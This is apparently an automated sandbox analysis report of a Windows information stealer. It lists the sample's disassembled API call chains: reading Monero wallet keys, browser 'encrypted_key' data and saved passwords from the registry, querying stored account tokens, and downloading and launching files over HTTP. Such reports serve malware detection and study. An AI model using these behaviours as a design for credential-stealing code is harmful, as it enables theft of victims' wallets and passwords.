                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0e5889855d746222fa9cc9e6676c2c8eb82eebeadf824cd742e76736c2a65ea4
                              • Instruction ID: 953e988e7a435edcbc873cc2f44d453ce298e16688c2c287ee20b57c00cff136
                              • Instruction Fuzzy Hash: 1912E071810608AADB1AEBA0DCD2FDEB778AF14300F504159F5467E191EF742B4ADF92
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 00326280: InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                                • Part of subcall function 00326280: StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                                • Part of subcall function 00326280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                                • Part of subcall function 00326280: HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                                • Part of subcall function 00326280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                                • Part of subcall function 00326280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335318
                              • lstrlen.KERNEL32(00000000), ref: 0033532F
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00335364
                              • lstrlen.KERNEL32(00000000), ref: 00335383
                              • lstrlen.KERNEL32(00000000), ref: 003353AE
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 10a753f4cc810fb91b7d2921333899576602ae52a4c91ab7d64423c703bb8f84
                              • Instruction ID: d7ab7b19c05acdc17e34d848e53d212bbb0737c926894a7f9f6c17dad0c0e8cf
                              • Instruction Fuzzy Hash: 47511030910648ABDB1AFF64DDD6AED7779AF10300F504018F4466F592DF386B46DBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: ffc6fbbc9f6600ab99bbc130e786c7d71cd94bc70ae6f4b82800fd8cf4d8594d
                              • Instruction ID: c56a4d859b21bf4b8d60702d7eb513e2ed96c64e26e8daed98d1ddc73889c26e
                              • Instruction Fuzzy Hash: 5CC1B4B590020DABCB15EF60DCC9FEA7778BF64304F104598F50AAB241EB70AA85DF91
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 003342EC
                              • lstrcat.KERNEL32(?,0109E080), ref: 0033430B
                              • lstrcat.KERNEL32(?,?), ref: 0033431F
                              • lstrcat.KERNEL32(?,0109D1E8), ref: 00334333
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338D90: GetFileAttributesA.KERNEL32(00000000,?,00321B54,?,?,0034564C,?,?,00340E1F), ref: 00338D9F
                                • Part of subcall function 00329CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00329D39
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 003393C0: GlobalAlloc.KERNEL32(00000000,003343DD,003343DD), ref: 003393D3
                              • StrStrA.SHLWAPI(?,0109E0F8), ref: 003343F3
                              • GlobalFree.KERNEL32(?), ref: 00334512
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                                • Part of subcall function 00329AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                                • Part of subcall function 00329AC0: LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 003344A3
                              • StrCmpCA.SHLWAPI(?,003408D1), ref: 003344C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003344D2
                              • lstrcat.KERNEL32(00000000,?), ref: 003344E5
                              • lstrcat.KERNEL32(00000000,00340FB8), ref: 003344F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 3f919eca83ea4f9de0d7eec6202c16eb6a44d6624098d6fa8ced7078f2ae2558
                              • Instruction ID: 66fe93ab47c60b8f58328ac7fe3b67d6f40459c10c677e5843fa079236569103
                              • Instruction Fuzzy Hash: 237187B6900218ABDB15EBA4DCC5FEE7379AF58300F004598F605AB181EB75EB49CF91
                              APIs
                                • Part of subcall function 003212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003212B4
                                • Part of subcall function 003212A0: RtlAllocateHeap.NTDLL(00000000), ref: 003212BB
                                • Part of subcall function 003212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003212D7
                                • Part of subcall function 003212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003212F5
                                • Part of subcall function 003212A0: RegCloseKey.ADVAPI32(?), ref: 003212FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0032134F
                              • lstrlen.KERNEL32(?), ref: 0032135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00321377
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00321465
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 003214EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 9c8e65cf7a315f5c6eb5415acb5f8031291f8ef5ab5a7c43ab8eb3920a046447
                              • Instruction ID: fa58aa4dca9ac7ac991ce6a81880cbdbae1e1a4ec8ab30b69ae9f4f3610ed7dc
                              • Opcode Fuzzy Hash: 9c8e65cf7a315f5c6eb5415acb5f8031291f8ef5ab5a7c43ab8eb3920a046447
                              • Instruction Fuzzy Hash: 6E5153B1D1011857CB16FB60DDD2BED737CAF54300F4041A8B64A6A081EF746B89DFA6
                              APIs
                                • Part of subcall function 003272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0032733A
                                • Part of subcall function 003272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003273B1
                                • Part of subcall function 003272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0032740D
                                • Part of subcall function 003272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00327452
                                • Part of subcall function 003272D0: HeapFree.KERNEL32(00000000), ref: 00327459
                              • lstrcat.KERNEL32(00000000,003417FC), ref: 00327606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00327648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0032765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0032768F
                              • lstrcat.KERNEL32(00000000,00341804), ref: 003276A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003276D3
                              • lstrcat.KERNEL32(00000000,00341808), ref: 003276ED
                              • task.LIBCPMTD ref: 003276FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 4d774c005fd86fd5e9dd4fca9e0e91c6de75b8d34675e4ebc38a266bf0aa62c0
                              • Instruction ID: bc76bab4bcc88167c9b27d1c2b5be69e01c140a7a8f61db76cd069dbf3d37862
                              • Opcode Fuzzy Hash: 4d774c005fd86fd5e9dd4fca9e0e91c6de75b8d34675e4ebc38a266bf0aa62c0
                              • Instruction Fuzzy Hash: 1B313C71D01109DBCB06EBA8EC96DFE7778BB54301B144118F102BB2A1DB74A98ADF52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0109E560,00000000,?,00340E2C,00000000,?,00000000), ref: 00338130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00338158
                              • __aulldiv.LIBCMT ref: 00338172
                              • __aulldiv.LIBCMT ref: 00338180
                              • wsprintfA.USER32 ref: 003381AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: ad50264c988f06c7ea03b868918d852b98a82478c5b8cbc615149c0abc5b38b2
                              • Instruction ID: 5f83ded23d00abeb2774198a2c085111a93c5c7911ef8eb40616a476908fa2fa
                              • Opcode Fuzzy Hash: ad50264c988f06c7ea03b868918d852b98a82478c5b8cbc615149c0abc5b38b2
                              • Instruction Fuzzy Hash: 90211DB1E44318ABDB00DFD8DD49FAEB7B8FB44B10F104509F605BB280D7B869058BA5
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                              • InternetOpenA.WININET(00340DF7,00000001,00000000,00000000,00000000), ref: 0032610F
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0032618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003261B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 003261DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0032620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00326249
                              • InternetCloseHandle.WININET(?), ref: 00326253
                              • InternetCloseHandle.WININET(00000000), ref: 00326260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 8f106f9683242385ea8df0a530e9eb356d89acdb87268fbbbf4031e7a9dfc1f9
                              • Instruction ID: 405e9ca773e51702bfccf7f1c625d2cc1a39c4ca88ce95befae9a55b122fdf95
                              • Opcode Fuzzy Hash: 8f106f9683242385ea8df0a530e9eb356d89acdb87268fbbbf4031e7a9dfc1f9
                              • Instruction Fuzzy Hash: E7514FB1900218ABDB21DF54DC86BEE77B8EF44701F108498F606BB1C1DBB46A89DF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0032733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003273B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0032740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00327452
                              • HeapFree.KERNEL32(00000000), ref: 00327459
                              • task.LIBCPMTD ref: 00327555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 86e3f51cb4596e67952aa68ce129d7e994328263e9b5aa1501b19970a7639007
                              • Instruction ID: 0005a13cd6b86155c10fc8d2bf502345b59c7ec84f062449629d97f96b992b90
                              • Opcode Fuzzy Hash: 86e3f51cb4596e67952aa68ce129d7e994328263e9b5aa1501b19970a7639007
                              • Instruction Fuzzy Hash: 33611BB5D042689BDB25DB50EC55FD9B7B8BF44300F0081E9E689AA141DBB06BC9CFA1
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0032BC9F
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0032BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0032BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0032BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 5d0034d008f3ce1b5fc0c3fd2452702e87365c7ef5178398dff065841d5dc472
                              • Instruction ID: 49ac24761d5bc8c904e1ae15a05c0331836914d63bcf3e44184426c5866555a2
                              • Opcode Fuzzy Hash: 5d0034d008f3ce1b5fc0c3fd2452702e87365c7ef5178398dff065841d5dc472
                              • Instruction Fuzzy Hash: BCB16172910608ABCB06FBA0DCD6EEE7778AF14300F404158F546BF091EF346A49DBA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: f9f49109396f8f7fc96239fa06fa8de3d51f4aec50a465a5d4e6443a7a818f82
                              • Instruction ID: f7bbfbf21370e7acbe7af8ece43e098bf5eadc3ff848ccac76edfc9e77fe8c10
                              • Opcode Fuzzy Hash: f9f49109396f8f7fc96239fa06fa8de3d51f4aec50a465a5d4e6443a7a818f82
                              • Instruction Fuzzy Hash: B3F05E30904209EFD3449FE8E90A72C7B74FB14703F044198E609A7390D6B04B42AF96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00324FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00324FD1
                              • InternetOpenA.WININET(00340DDF,00000000,00000000,00000000,00000000), ref: 00324FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00325011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00325041
                              • InternetCloseHandle.WININET(?), ref: 003250B9
                              • InternetCloseHandle.WININET(?), ref: 003250C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
